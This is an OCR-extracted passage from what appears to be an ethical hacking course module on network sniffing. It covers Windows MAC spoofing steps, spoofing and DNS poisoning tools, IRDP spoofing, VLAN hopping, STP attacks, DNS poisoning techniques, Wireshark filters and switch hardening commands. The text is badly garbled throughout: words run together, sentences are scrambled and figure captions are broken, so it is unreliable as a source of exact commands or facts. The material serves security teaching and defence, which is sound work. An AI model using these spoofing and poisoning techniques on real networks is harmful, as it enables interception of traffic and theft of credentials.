Thereare two methodsforMACspoofing
in Windows10OS:
Method
4:
If cloneMACaddress,
the networkinterfacecardsupports thenfollowthesesteps:
1. Clickon Start,searchfor ControlPaneland open it, then navigate
to Networkand
Internet
>Networking
and
Sharing
Center.
2. Clickon Ethernetandthenclickon Properties
in theEthernetStatuswindow.

8
Module Page1142 ical andCountermensores
Mackin Copyright
©
by E-Comel
 In the EthernetProperties clickon the Configure
window, button andthen on the
Advancedtab.
Underthe “Property―
browsefor NetworkAddressandclickon it.
section,
Onthe right-hand
click
assignand
side,under“Value,―
OK.number
typei n the new MAC
address you wouldliketo

Note:
Type
Enter the MACaddress
“ipcontig/all―
config
or “net rdr―
without“:―
i n between,

i n thecommand promptto verify

thechanges.
Ifthe changes or elsetry method2 (change
are visible,then rebootthe system, MAC
addressi n the registry).

[
eanek
Contre
Pcl GEFoy Propeties
Taearcedomer Oats Everts

to change
Method2: Steps
839: Ethernet
Figure dialog
Properties
the MACaddressi n the registry’
box
1. PressWin+ Rto openRun,andtyperegedit32 to start the registry
editor.
2. Note: Do not type Regeditto start the registry editor. Go to
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class
Lce-bfe1-08002be10318} o n it to expand
anddouble-click the tree.
Four-digit
sub keysrepresenting
network adapters
will be found (starting
with 0000,
0002,etc.)
(0001,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Searchfortheproper“DriverDesc―
keyto findthe desired
interface.

(data on
Right-clickthe appropriate
type"REG_S2―)
subkeyandaddthe new stringvalue“NetworkAddress―
to contain the new MACaddress.

Right-click stringvalueon the rightsideandselectModify.

on the “NetworkAddress―

Now,in the “Edit

String― box,enter the new MACaddressi n the “Value
dialog data―
field andclick “OK.―
Disableandthenre-enable that was changed,
the networkinterface or rebootthe
system.

fegistryEator

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MAC Tools
Spoofing

Mikeserene et
hades | ee

MAC Spoofing
Tools
TechnitiumMACAddressChanger
Source:https://technitium.com
Technitium Changer
MAC Address (TMAC)
allowsyou to change
(spoof)
the MAC
addressof your NICinstantly.
Every
NIChas @MACaddresshardcodedi n its circuit by
the manufacturer.Thishard-codedMAC addressis usedbyWindowsdriversto access
the Ethernet
the original network
(LAN).
hard-codedtoolThis can set a new MACaddressto your NIC,bypassing
MAC address.
shownin the screenshot,
‘As attackers c an use TMACto spoof theirMAC
or change
addressto perform
an attackon the targetsystem,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 [Technine

1D
MaudmateFCIVEN

D
Condig
10cm
(90521 9800
Urarwn Vand

MAC
‘Active Adtiest

et:
TOPAP Enaies TOPAPvE:
Erstled Unknown
Van

|
eee call
Figure841:Screenshotof TechntiumMACAddressChanger
(TMAC)
Someexamples
ofMACspoofing
toolsare listedbelow:
=
SMAC(http://www.klcconsulting.net)
(https://www.novirusthanks.org)
MACAddressChanger
Change (https://lizardsystems.com)
MACAddress

Easy Changer
Mac (https://github.com)
‘Spoof-Me-Now
(https://sourceforge.net)
 IRDP Spoofing
1@c M RouterOscover ProtocolROP)
‘outers ther subnet IP of
thatallows host
protocol
i s routng dscoverthe adresses active
andwoltingmessageson thernetwork
bysteningtortor advertisement
Theattacker
3
sendsspoofed
defolt router whatevert heatacher choses the
ROProuteradvertisement
change
messageto hoston thesubnet,
causingto ts

This
tack allows theatacler os
racers an use
he
waffle and
nd collecvalableinformation
to lunchman-nthe-midle,
ROPspoofing ania servic,
fromhe packets
sitingtacks
passive

IRDPSpoofing
ICMPRouterDiscovery Protocol(IRDP) is a routing protocolthat allowsa hostto discoverthe IP
addresses of activerouters on its subnetbylistening to router advertisement andsolicitation
messages on its network.Theattackercan adddefaultroute entries on a system remotely by
spoofing router advertisement messages. As IRDP doesnot requireany authentication, the
targethostwill prefer the defaultroute definedbythe attackerover the defaultroute provided
bythe DHCPserver. Theattackeraccomplishes this bysettingthe preferencelevelandlifetime
of the route at high valuesto ensure that the targethostswill chooseit as the preferred route.
‘This
attacksucceeds if the attackerlaunching the attackis on the same networkas the victim.
In the case of a Windowssystem configured as a DHCP client,Windowschecksthe received
router advertisements for entries. If there is onlyone, then it checkswhetherthe IP source
addressi s withinthe subnet. Ifso,then it addsthedefaultroute entry;otherwise, it ignoresthe
advertisement,

gure
8.42:
ROP spoofing

ical andCountermensores
Mackin ©by E-Comel
Copyright
An attackercan use thisto sendspoofed router advertisement messages so that all thedata
packetstravelthrough the attacker’s
system.Thus,the attackerc an sniffthe trafficandcollect
valuableinformation fromthedata packets. Attackerscan use IRDPspoofing to launch MITM,
oS, andpassivesniffing attacks.
‘=

a
PassiveSniffing:In switchednetwork,the attacker
outboundtrafficof targethoststhrough spoofs
IRDPtraffic to re-route the
the attacker'smachine.
MITM: Oncesniffingstarts,the attackeracts as a proxy betweenthe victim and the
Theattackerplays
destination. an MITM roleandtries to modifythetraffic.
DoS:IRDPspoofing
allowsremote attackersto addwrongroute entries into thevictim's
routing
table.address
Prevent IRDPspoofing
The wrong
attacksbydisabling
entrycauses DoS.
IRDPon hosts,
ifthe OSpermits
it

ical andCountermensores
Mackin ©by E-Comel
Copyright
 VLAN Hopping

LAN hopping
stacksota sete infra such
x
psa, modi erupt ar dl e dat,

‘VLAN
Hopping
Virtual local area network (VLAN) hopping is a techniqueused to targetnetwork resources
present on a VLAN.Themain purposebehind a VLAN hopping attackis to gain accessto the
traffic flowing i n other VLANspresent in the same network, whichis otherwiseinaccessible.
Networksusually havepoor VLAN implementation or havemisconfigurations that allow
attackersto perform this typeof attack.Attackersperform VLANhopping attacksto steal
sensitive informationsuchas passwords; modify, or deletedata;
corrupt, installmaliciouscodes
or programs; or spread viruses,Trojans,
andworms throughout thenetwork,
VLANhopping attackscan be performed via two primary methods, as given below:
=
SwitchSpoofing
switchspoofing,
Using the attacker
connectsa rogueswitch bytricking
into thenetwork
a legitimate switchandthereby creating a trunklinkbetweenthem.After establishinga
multiple
trunk link,the trafficfrom VLANscan be sent to and through
the rogueswitch,
therefore allowing an attackerto sniff and view the packetcontent. Thisattack is
successfulonlywhen the legitimate switch is configured
to negotiatea trunk
connection,or when the interfaceis configured auto,―
with “dynamic “dynamic
desirable,―
or “trunk―
mode.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Rogue(eee
Sunch

DoubleTagging
&
=
HD
Servers Server?

Using the attackeraddsand modifiestagsin the Ethernetframe,

double tagging,
thereby allowingthe flow of traffic throughany VLAN i n the network.The Ethernet
framethat is sent bythe attackercontains two 802.1 tags,inner andouter; the inner
tagis the VLANtagof a target switchthat the attackerwants to reach,
andthe outer tag
is the native VLANof the attacker. Whenthe switchreceives the Ethernetframe,i t
outer
stripsoff the
tag, as itis the same as the tagfor the native VLAN,
framewith an inner tagon all its trunkinterfaces.
networkmechanism
andforwardsthe
Thisallowsan attackerto bypass
byjumping fromhis native VLANto the victim'sVLAN(s),
andalso
the

allowshim/her to sendthe trafficto otherVLANs.Thisattackis possible

onlyif the
switchportsare configured
to use native VLANs.

switch1
——. ‘switch
2

stack
van
ED&
Server

Figure
8.4: lusrationofdouble
tating

ical andCountermensores
Mackin ©by E-Comel
Copyright
 STPAttack

STPAttack
In a Spanning TreeProtocol(STP) attack,attackersconnect a rogue switchinto the networkto
change the operation ofthe STPprotocol andsniffall thenetworktraffic.STPis usedi n LAN
switchednetworkswith the primaryfunctionof removingpotential loops within the network.
STPensures thatthetrafficinsidethenetworkfollowsa n optimized pathto enhancenetwork
performance. a switchinsidethe networkis appointed
In this process, as the root bridge.After
the selectionof the root bridge,otherswitchesi n the networkconnect to it byselecting a root,

port to
(theclosestport the root bridge).
Theroot bridgeis selectedwith the helpof BridgeProtocolDataUnits(BPDUs).
BPDUseach
numberknownas a BID or ID. TheseBIDsconsistof the Bridge
havean identification Priority
andthe MACaddress.Bydefault, thevalueof the Bridge
Priority
is 32769.

IFanattackerhasaccess to two switches, he/she introducesa rogueswitchi n the networkwith

a prioritylower thanany other switchi n the network.Thismakesthe rogueswitchthe root
bridge,
thusallowing the attackerto
sniff
all thetrafficflowingi n the network.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 cow

=
Switch2
erty 32769 server

Priority
rogueSwitch
Tt
oon

Switch?

attacker
Figure8.45:
lustrationofanSTP
attack

Modul
8 1152
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
 How to DefendAgainst
MACSpoofing
DHCPSnooping
‘Use
Binding
ARP Dynamic Inspection,
Table, andIPSource
Guard

“ae
Bee
_———
How to DefendAgainst MAC Spoofing
Performingsecurityassessmentsis the primary ai m of a n ethicalhacker.An ethicalhacker
attacksa target networkor organization with the knowledge and authorizationof its
management, to find loopholes architecture.However,
i n the security the jobdoes not end
there.Finding
thoseloopholes is a minor task.The most crucial taskof ethicalhackingis to
applythe appropriate
countermeasuresto security loopholes to fix them,
Onceyou havetestedthe networkfor MACspoofing attacksandcollectedsecurity loopholes,
you shouldapply countermeasuresto protectthenetworkfromfurtherMACspoofing. Many
MACspoofing
countermeasurescan beapplied
to specific andloopholes.
networkarchitectures
Apply theappropriate
countermeasuresto your network.
TodetectMACspoofing, to knowallthe MACaddresses
it is necessary in the network.Thebest
way to defendagainstMAC addressspoofing is to place
the server behindthe router. Thisis
because routers depend
onlyon IPaddresses,whereasswitchesdepend on MACaddresses for
communication in a network.Making changesto the portsecurity interfaceconfiguration
is
anotherwayto preventMACspoofing attacks.Onceyou enable the port-security
command, it
allowsyou to specify the MACaddressof the systemconnectedto the specific port.It also
allowsforspecific
action to be takenif a portsecurity
violationoccurs.
You can alsoimplement
the following to defendagainstMACaddressspoofing
techniques
attacks:
+
DHCP SnoopingBinding Table: The DHCP snoopingprocess filters untrusted DHCP

address,and
messageshelps
to correspond
to buildandbind a DHCP
leasetime,binding
IP address,
bindingtable,
type,VLAN number, This the
tablecontains MAC
andinterfaceinformation
with untrustedinterfacesof a switch,It acts as a firewall between

ical andCountermensores
Mackin ©by E-Comel
Copyright
untrustedhostsandDHCPservers. It also helps
i n differentiating
betweentrustedand
untrustedinterfaces.
Dynamic Thesystemchecksthe IP-MAC addressbinding
ARPInspection: for eachARP
packet a DAl,the system
in a network.While performing will automatically
dropinvalid
bindings.
IP-MAC address
IP SourceGuard:IPSourceGuardis a security featurei n switches
that restricts the IP
trafficon untrustedlayer
2 portsbyfiltering
trafficbasedo n the DHCPsnooping binding
database. spoofing
It prevents attackswhenthe attackertries to spoofor use the IP
of host,
address another
Encryption:
Encrypt
the communication betweenthe access pointand computerto
preventMACspoofing.
Retrievalof MACAddress:Youshouldalways retrieve the MACaddressfromthe NIC
directly
insteadof retrieving
it fromthe OS.
Implementation Thisis a typeofnetworkprotocol
of IEEE802.1XSuites: for port-based
NetworkAccess Control(PNAC), andits main purposeis to enforceaccesscontrolat the
pointwherea user joinsthe network.
(Authentication,
‘AAA andAccounting):
Authorization, Use an AAA (Authentication,
Authorization,
andAccounting)
server mechanism
to filter MACaddresses subsequently

846:
Figure Defending MACspoofing
against

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to DefendAgainst
VLAN
Hopping
SwitchSpoofing
Dofendagainst DoubleTagging
Dofendagainst

configure
©Exley
ports
access
ports that
each
access
the
with
1)
andensre thatallaccess ports
as “a:
Ensure
VIAN exeptthedefalt AN
portsassigned
(VLAN

native
VLANs
configured unused
ports
are
“©
Enaurethathe oo al run
swiechportmoda nonagotia changeto an VLAN 1D:

Ensure
ports
tha allrunk are itchport trunk native vlan 999

switch
ae
awitenportnode
(contig-16)Â¥ ports expt tagged

switch
(config-if)# awitchpartmode

How to Defend
DefendAgainst
VLAN
Against Hopping
SwitchSpoofing
Performthe followingsteps to configure
a switchto preventswitchspoofing
attacks:
‘=
Explicitly
configure the portsas access ports,andensure that all access portsare
configured trunks:
not to negotiate
switchport mode access

switchportmode nonegotiate
Ensurethat all trunkportsare configured trunks:
not to negotiate
switchportmode trunk
switchportmode nonegotiate
DefendAgainst
DoubleTagging
thefollowing
Perform stepsto configure
a switch doubletagging
to prevent attacks:
=
withVLANexceptthe defaultVLAN(VLAN
Ensurethateachaccessportis assigned 1):
switchport access vlan 2
Ensure
that
native
VLANs
on
all are
the
switchport trunk ID:
native vlan
trunkports changed
999
to an unused
VLAN

Ensure
vlan
that
native
VLANs
on
all are
the
dotigqtag
explicitly
tagged:
native
trunkports

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to DefendAgainst
STPAttacks
T oprevent
an
STP
attack,thefolowing

BPDUGuard
features
security must beImplemented

LoopGuard
{©Toenabie
the BPOU
guard
onalPortfast
edge Toenable
theloopguard
on a in

Ineartace ghgubivesthernet ‘neareace

plmabttoetharnet

spanning-treeporttast bpduguard spanning-treeguardLoop

the
ear
Root
‘Tosnableroot
Guard
feature on an
‘UDED
(Unidirectional
onLink
UDLODetection)
1@T oenable an interface

interac:
sntartace
gigabiteatharaet slot/port
configure terminal

did ( arable | disable | aggressive

spansing-treeguardroot,

How to DefendAgainst
STPAttacks
Implement
the following
countermeasuresto defendagainst
STPattackson switches:
©
BPDU Guard:BPDUguard must be enabledon the portsthat shouldnever receive a
BPDUfromtheir connecteddevices.Thisis usedto avoidthe transmissionof BPDUs
on
PortFast-enabled Thisfeaturehelps
ports. i n preventing bridging
potential loops i n the
network.If BPDUguard i s enabled o n a switchinterface andan unauthorizedswitch
connectsto it, the portwill be set to errdisablemodewhen a BPDUis received.The
errdisable
modeshutsdown the port and disables i t fromsending or receivingany
traffic
Usethe following to enableBPDUguard
commands on a switchinterface:

configure terminal
interface gigabiteethernet slot/port
spanning-tree portfast bpduguard

Root
in Guard:
ports)
protectsensures
Rootguard
the STPtopology.
nearby
to prevent the
as
thetheroot bridge
and
It forcesthe interfacesto becomethe designated
switches frombecoming root switches.
thatit remains
ports(forwarding
Therefore, if aport
root

enabledwith the root guard featurereceives a superior BPDU, it converts that portinto
a loop inconsistentstate (not thusprotecting
errdisabled), an STP topology change. This
portremains inactive onlyfor that specific switch/switchesattemptingto change the
STPtopology. Thisportremains i n downstate untiltheissueis resolved.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Usethefollowing to enable
commands featureon a switchinterface:
the root guard
configure terminal
interface gigabiteethernetslot/port
spanning-tree guard root
LoopGuard:Loopguard improves the stability
of the networkbypreventingit against
thebridging
loops.
It is generally
usedto protectagainsta malfunctioned
switch,
Usethe following to enablethe loop
commands guard
featureon a switchinterface:
configure terminal
interface gigabiteethernetslot/port
spanning-tree guardloop
UDLD (Unidirectional
unidirectional
Link Detection):
linksand further disablethe affected
unidirectionallinksi n the networkcan cause
to
UDLD enablesdevices detectthe existenceof
interfacesi n the network.These
STPtopology
loops.
Use command
following
the
toenable
on
a
configure terminal
UDLD switchinterface:

interface gigabiteethernet slot/port

udld { enable | disable | aggressive }

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DNSPoisoning
Techniques
|@ DNSposoningis
technique
titties
aDNS
server
| fora
target adares
givenentries
server
Into beleing that haereceiveda utent information
allows the attackert o
site ona
paceIP
ONS withtheI P

DASlevel
numeric address
ofa
(©eresuts inthesubstitution

to
thatconten)
wth
fle I addres at the

target
server,
where thewebaddressesare converted
into
Theatacerc an
ene
"ima
rate fakeONSentries forthe
(entiningmalicious
ofthe
names

e ns erat

DNSPoisoning
SniffingTechnique:
Thissection describesDNSpoisoningtechniques to sniffthe DNStrafficof a targetnetwork.
Usingthistechnique, an attackercan obtainthe IDof the DNSrequestbysniffing andcan send
reply
a malicious to the senderbefore theactualDNSserver responds.
DNS Poisoning Techniques
DNSis the protocol
that translatesa domainname (e.g.,
www.eccouncil.org)into an IP address
(e.g., Theprotocol
208.66.172.56). uses DNStablesthat contain the domainname and its
equivalent
IP addressstoredi n a distributedlarge
database.In ONSpoisoning,alsoknownas
DNSspoofing, the attackertricksa DNSserver into believing that it hasreceivedauthentic
informationwhen, in reality,
it hasnot receivedany.Theattackertries to redirectthe victim to
a maliciousserver insteadof the legitimateserver. Theattackerdoesthis bymanipulating the

IPof
DNStable entries in the DNS.Thisresultsi n substitution a falseIP addressat the ONSlevel,
are
wherewebaddresses converted into numeric addresses.
Whenthe victim tries to accessa website, theattackermanipulates the entries in theDNStable
so
that systemredirectsthe URLto the attacker'sserver. Theattackerreplaces
the victim’s
addressentries for a targetsite on a given DNSserver with the IP address the server
(malicious server) he/shecontrols.Theattackercan create fake ONSentries for the server
IP

of
(containing maliciouscontent) with the same names as thatof the targetserver. Thus, the
victim connectsto the attacker'sserver without realizing it. Oncethe victim connectsto the
attacker'sserver, the attacker
can compromise the victim'ssystem andstealdata,

ical andCountermensores
Mackin ©by E-Comel
Copyright
DNSpoisoningis possible
usingthe following
techniques:
=

Internet
DNS
Intranet Spoofing
ONS Spoofing
Proxy Server DNSPoisoning
=
DNSCache Poisoning

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IntranetDNSSpoofing
1Gfothsteenique,

12 It vrk
theatacke’
system

wellagantstehes
mustbe connected

with ARPPeon Routing

o the localarea
network
(LAN)andbe al eost

ae

Intranet DNSSpoofing
attackercan perform
‘An an intranet DNSspoofing
attacko n a switchedLANwith the helpof
the ARPpoisoningtechnique. To performthisattack,
the attackermustbeconnected to the
LANandbeableto sniffthetrafficor packets. Anattackerwhosucceeds in sniffing
the IDof the
DNSrequest from the intranet can senda malicious
replyto the senderbeforethe actualONS
server.
Thediagram how an attackerperforms
describes an intranet DNSspoofing.

In the diagram,
Figure8.47:
DNS
Intranet spoofing
the attackerpoisonsthe router byrunningarpspoof/dnsspoof to redirectONS
requests of clientsto the attacker’s
machine. Whena client(John) sendsa DNSrequestto the
router, the poisoned router sendsthe DNSrequest packet to the attacker'smachine.Upon

ical andCountermensores
Mackin ©by E-Comel
Copyright
 the attackersendsa fakeDNSresponse
receivingthe DNSrequest, that redirectsthe clientto a
fake websiteset up bythe attacker.The attackerowns the websiteand can see all the
information submitted
such as passwords,
information
can
bytheclientto thatwebsite.Thus,the attacker sniffsensitive data,
submittedto the fake website.The attacker retrieves the required
andthen redirects
theclientto therealwebsite.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 InternetDNSSpoofing

to
that
ONSSpoofing,
|@ ‘Internet the atacer
ofthe attacker’ infects
John's
machine changes
with aTojanand hisONSIPaddress

Internet DNSSpoofing
Internet DNSpoisoning is alsoknownas remote ONSpoisoning. Attackerscan perform ONS
spoofing attackso n a single
victim or on multiple
victims anywherei n the world.To perform
thisattack,
a DNS
Attackersperform
with
a IP
theattackersetsup rogue server
Internet DNSspoofing
static address.
with the helpof Trojanswhenthe victim’s
system
to
the changes
connects Internet.Thisis an MITM attackin whichtheattacker
entries of the victim’s Theattackerreplaces
computer.
IP addressthat resolvesto the attacker'ssystem.
the victim’s
Thus,
theprimaryONS
DNSIPaddresswith a fake
the victim’s
trafficredirects
to the
attacker'ssystem.At this point,the attacker can easilysniff the victim’sconfidential
information.
Thefigure
illustratesan attackerperforming
InternetDNSspoofing. Theattackerinfects
John’s
machinewith a Trojanandchanges hisDNSIP address
to that of theattacker.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ProxyServerDNSPoisoning
‘thatthe
aackersandrdivects
othe fakewebsite

omnes x

ServerDNSPoisoning
Proxy
In the proxy server DNSpoisoning technique,
the attackersets up 2 proxy server on the
attacker's system.Theattackeralsoconfigures
a fraudulent DNSandmakesi ts IP address a
primaryDNSentryin the proxyserver. Theattackerchanges the proxyserver settings
of the
Theproxyserves as a primaryDNSand redirects
victim with the helpof a Trojan. the victim's
traffic to the fake website,wherethe attackercan sniff the confidentialinformationof the
victim andthen redirectthe requestto the realwebsite.
As shownin the figure, an attackersendsa Trojan machinethat changes
to John’s his proxy
i n InternetExplorer
server settings to thoseof the attacker,
andredirectsthe request
to a fake
website

8.49:
Figure server ONS
Prony p oisoning

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DNSCachePoisoning
“a
DAScache
forged
refers
poisoning
avery redvectedtoa
or adn
to altering
malcous
ONS
records
nto the ONS
resolver
cache that DNS

|G Ifthe
ONS ONS
responses
reser
have
been
reeled
canna validate
thatthe froman authoritative sore,

o ok
DNSCachePoisoning
DNScachepoisoning refersto altering or adding forged DNSrecordsi n the DNSresolvercache
so that a DNSquery is redirected to a malicious site. TheDNSsystem uses cache
memoryto
holdthe recently resolveddomainnames.Theattackerpopulates it with recentlyuseddomain
names and their respectiveIP address entries.When a user requestis received, the ONS
resolverfirst checksthe DNScache; if the systemfinds the domain name that the user
requested i n the cache,the resolverwill quickly
sendits respectiveIP address. Thus,
it reduces
thetrafficandtime of DNSresolving.
targetandmakechanges
‘Attackers or addentries to thisDNScache. If the ONSresolvercannot
validatethatthe DNSresponseshavecome froman authoritative source, it will cache
the
incorrect entries locallyand serve them to users who makethe same request. Theattacker
replaces the user-requested IP address with the fakeIP addressand,whenthe user requests
that domainname, the DNSresolverchecksthe entryi n the DNScacheand picks the matched
(poised)entry. Then,it redirectsthe victim to the attacker's
fakeserver insteadof the intended
server.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DNSPoisoning
Tools

DorpNspoot theONS a
DerpXSpooisONSposorngoo tha asin
| spoaing querypacket
edress grup
ora ofows
of etn
inthe network
Seiad

DNSPoisoning
Tools
DNSpoisoning toolsallowattackersto redirecta domainname to a differentIPaddresslistedi n
a fakeDNSentryfile.TheDNSrequest madeto thetarget sitegoesthrough a server containing
malicious
content with the samename.
=
DerpNSpoof
Source:https://github.com
DerpNSpoof is a DNSpoisoningtool that assistsin spoofing
the DNSquery packet
of a
certain IP address or a groupof hostsi n thenetwork.

Usingthistool,attackers
a
can create list offakeDNSrecords
thetool to redirectthe victim to some otherwebsite,
andloadit whilerunning

Module
8 1167
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
Someexamples
851:are
Figure Screenshotof DerpNSpoof

of additionalDNSpoisoningtools
tol
listedbelow:
DNS Spoof
(https://aithub.com)
=
(https://github.com)
DNS-poison
+
(http://www.ettercap-project.org)
Ettercap
Evilgrade
(https://github.com)
TORNADO(https://github.com)
 How to DefendAgainst
DNSSpoofing

(onsseg arta o athe wee

Scare
ea
Socket
Layer
he (St forsnering tafe
‘Use
ONSNonExtentDoman
wows (HADOMAIN
Rate
oni eal torestr externaONSlookups Shel(SHeneption
se Secure

How to DefendAgainst
DNSSpoofing
MajorDNSimplementations
have reported
attacksusing DNSspoofing,
andthis vulnerability
still affectsa large
numberof organizations.
Thisis because
of a lackof information
when
performing
DNSqueries,whichallowsattackersto spoof
DNSresponses.
Youhaveseen how an
attacker typesof DNSspoofing
carries out different attacks.
We now look at how to defenda
networkfromthesetypesof attacks.
Countermeasures that helppreventDNSspoofing
attacks:
Implement Domain Name System Extension(DNSSEC)
Security
UseSecureSocketLayer
Resolve
(SSL)
all DNSqueriesto a localDNSserver
the
forsecuringtraffic

being
BlockDNSrequests sent to externalservers
Configure
a firewallto restrict externalDNSlookup

implement
an intrusion detectionsystem (IDS)
anddeploy it correctly

Configure
the DNS resolverto usea new random source portforeachoutgoing
query
Restrictthe DNSrecusingservice, either fullor partial,
to authorizedusers
UseDNSnon-existent domain(NXDOMAIN)
rate limiting
Secureyour internalmachines
UsestaticARPandIP tables,
UseSSHencryption

ical andCountermensores
Mackin ©by E-Comel
Copyright
Donot allowoutgoing
trafficto use UDPport$3 as a defaultsource port
Auditthe DNSserver regularly
to remove vulnerabilities.
Usesniffing
detectiontools
Do not opensuspiciousfiles,
use trustedproxysites
Always
Ifa companyhandles
i ts own resolver,
it shouldbe keptprivate
andwell protected
Randomize
source anddestinationIPaddresses

Randomize
Query1D
Randomize
case in the name requests
(Pk)to protecttheserver
Infrastructure
UsePublicKey
Maintaina single rangeof IPaddresses
or specific to login to the systems
Implement
packet
filtering
for bothinboundandoutboundtraffic
RestrictDNSzone transfersto a limitedset of IP addresses

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

2 oo
2 oo

Sonn
SniffingTools
administratorsu se automated
System tools to monitor theirnetwork,
but attackers
m isuse
thesetools to sniff networkdata. Thissection describestoolsthat an attackercan use for
sniffing,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Tool:Wireshark
Sniffing
yu
capture
and

Wireshark
Source:https://www.wireshark.org
Wireshark letsyou capture andinteractively
browsethe trafficrunningon a computernetwork.
Thistool uses WinPcap to capturepacketson its own supported networks.It captureslive
networktrafficfromEthernet, IEEE802.11,PPP/HDLC, ATM,Bluetooth, USB,TokenRing, Frame
Relay, andFODInetworks.Thecaptured filescan be programmaticallyeditedvia thecommand-
line. Aset of filtersfor customizeddatadisplay
can berefinedusing a displayfilter.
attackersuse Wiresharkto sniffandanalyze
shownin the screenshot,
‘As the packet
flow i n the
targetnetworkandextract criticalinformationaboutthe target,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 St il ga i i

igre 8.52:
Capturing usingWireshark
packets

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FollowTCP Streamin Wireshark

Follow TCPStreamin Wireshark

Source:https://www.wireshark.org
Wiresharkdisplays datafromthe TCPport with a featureknownas "FollowTCPstream.―The
tool sees TCPdatain the same way as that of the applicationlayer.Usethis tool to find
passwords in a telnet session or to interpret
a datastream

To see the TCPstream, selecta TCPpacket

i n the packetlistof a stream/connection andthen
selectthe FollowTCPStreammenu item fromthe WiresharkToolsmenu. Wiresharkdisplays
all the datafromthe TCPstream bysetting an appropriate displayfilter. Thetool displays
the
streaming content in the same sequenceas it appeared on the network.It displays the
captured datai n ASCII,
EBCDIC, hexdump,
C array,or raw formats.
showni n
‘As thescreenshot,
attackerscan capture networktrafficandgainthecredentials of a
targetmachine.They i ts remote interfaceand monitor the trafficgenerated
attemptto capture
from a user'sbrowsing
activities to extract confidentialuser information,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 854:
Figure Wireshark
featureFollowTCP

ical
Steam

andCountermensores
Mackin ©by E-Comel
Copyright
 Filters in Wireshark
Display
fitersare usedto change
Display the view of packets files
inthecaptured

| exami:typetheprotocol
inthe fer boxar, it, tp ud, dos,Fp

DisplayFilters in Wireshark
Source:https://wiki.wireshark.org
Wiresharkfeaturesdisplay filtersthat filter traffic on the targetnetwork byprotocol type,IP
address, filtersare usedto change
port,etc. Display
set up a filter,typethe protocol
ofWireshark.
Wireshark
the
view
of captured
files.
name, suchas arp, http,tcp,udp,
filtersat a time.
can use multiple
packetsi n the To
dns,and ip, i n the filter box

Someof the display

filtersi n Wiresharka re listedbelow:
=
Display
Filtering
byProtocol
Type filter
theSpecific
‘Monitoring
box:
Example: the protocol
i n the

Ports
arp, http,tep,udp,
dns,ip

0 tep.port==23
0 ip.addr==192.168.1.100 machine
Ap.addr==192.168.1.100 && tcp.port=23

Filtering
Multiple
==
by IPAddresses
© Sp.adde 10.0.0.4 or ip.addr

©by==
FilteringIPAddress
ip.addr 10.0.0.4
OtherFilters

==
ip.dst
==
ip.addr
10.0.1.50
10.0.1.12
frame.number < 30
&& frame.pkt_len >
&& icmp 6& frame.number
400
> 15 6

ip.src==205.153.63.30or ip.dst==205.153.63.30
176 tical andCountermensores
Making by Comet
Copyright©
 Additional WiresharkFilters

ply HT Treen
Dips ST pr 2] andOP te

Far
bya
(eS
and
eat
potecal er unwanted

Additional WiresharkFilters
Source:https://wiki-wireshark.org
Someexamples
of additionalWiresharkfiltersare listedbelow:
tep. flags. reset==1
Displays
all TCPresets
udp contains 33:27:58
Setsa filter for the hexvaluesof 0x330x270x58at anyoffset
http. request
Displaysall HTTPGETrequests
tep.analysis. retransmission
Displays
all retransmissionsinthe trace
tep contains traffic
Displays
all TCPpackets
that contain the word“traffic―
!(axp or icmp or dns)
Masksout arp,icmp,dns,
or other protocols
andallowsyouto view thetrafficof your
interest
tep.port
Setsa
==4000
filter for anyTCPpacket
with4000as a source or destinationport

ical andCountermensores
Mackin ©by E-Comel
Copyright
 tep.port eq 25 or icmp
Displays
onlySMTP(port25)andICMPtraffic
ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
Displays
onlytraffic i n the LAN(192.168.x.x),
betweenworkstations
andservers—no
Internet
f
Ap.sre '=s0etse

Filtersbya protocol
(e.g,
SIP)
20000 £6 ip.dst
andfiltersout unwanted IPs.
= 200¢002002000 EE Sip

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Tools
Sniffing igEH

]
Sniffing
Tools (Cont'd)
CEH
|i
OmniPeck we omer Anaaer

reses ot f

on
Irpection

SniffingTools
=
SteelCentral Analyzer
Packet
Source:https://www.riverbed.com
SteelCentralPacketAnalyzer providesa graphical
consolefor high-speed
packet
analysis.
Thistool comes integratedwith Riverbed
AirPcapadapters
to analyze
and
troubleshoot802.11wirelessnetworks.

Modul
8 1179
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 terabytes
As it captures of packet
datatraversingthe network, thistoolreads
thattraffic
and displays it i n a graphical
user interface (GUI).It can analyze mult-gigabyte
recordingsfromlocally presented trace filesor on remote SteelCentral NetSharkprobes
(physical,
virtual,
or embedded on SteelHeads) without a largefile transfer,
to identify
anomalousnetworkissues or diagnose and troubleshoot complexnetworkand
applicationperformance issues downto the bit level

Attackerscan use SteelCentral PacketAnalyzer to capture and monitor long-duration

networktrafficas well asto analyze differenttypesofdataon the network.

@O22%*
CBSie BBgy Otro Cerone
sce
©
Pron
:
Sey,
eg
Sard
+1
les
I
Sten ©
Sine
Ger

FaeEstherTie[0
eee) Tata
myRi]

Toten ed rena

peers |(Corot
{aetna dren

Sander
owe
mente ae «+ 45 WSD [ae tne Teale 65

Capsa
Analyzer
NetworkAnalyzer
Figure8.5:Screenshot
ofStelCentral
Packet

Source:https://www.colasoft.com
CapsaNetwork Analyzer
is a network-monitoring tool that captures
all the data
transmittedover the networkand provides a wide rangeof analysis
statistics in an
intuitive and graphic
